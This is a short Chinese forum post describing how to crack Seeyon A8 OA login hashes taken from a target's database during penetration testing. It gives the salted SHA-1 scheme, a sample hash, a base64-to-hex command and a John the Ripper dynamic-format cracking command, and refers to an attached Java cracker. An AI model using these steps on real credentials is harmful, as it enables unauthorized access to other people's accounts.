请选择 进入手机版 | 继续访问电脑版
查看: 2274|回复: 0

Seeyon A8 登录hash破解案例

[复制链接]
  • TA的每日心情

    昨天 11:47
  • 签到天数: 1268 天

    [LV.10]以坛为家III

    发表于 2021-12-13 20:17:50 | 显示全部楼层 |阅读模式
    背景: 渗透时拿到目标库却不能登录到后台看看是件极其难受的事情,
    最舒服的事情莫过于加载数10TB 字典爆破一周未果...
    用户登录加密部分文件:seeyon-ctp-core.jar (by @Jas502n)
    [AppleScript] 纯文本查看 复制代码
    ./com/seeyon/ctp/common/security/MessageEncoder.class


    加密算法: sha1($salt.sha1_raw($pass))
    1. java 代码实现破解(见附件)
    by @会上树的猪

    2. 使用 John the Ripper 自定义算法破解
    [AppleScript] 纯文本查看 复制代码
    bash> echo FAyHSZpR7JVAhQi1/0fe7n8Fn3Q= | base64 -d | xxd -p -c 40
      # 将base64 raw 类型转换成hex类型

    [AppleScript] 纯文本查看 复制代码
    bash> john  --format=dynamic=sha1($salt.sha1_raw($pass)) --pot=out.txt --wordlist=all_dic.txt h.txt --fork=4

    john 支持自定义算法

    最后john yyds!!!!

    FqhDpOjutizb3HFQnmMYaTaO2gdQ.png
    FuQFryfQVOjz_-1o_DE-KXY7QR14.png

    seeyonDecrypt.zip (4.31 MB, 下载次数: 0)
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表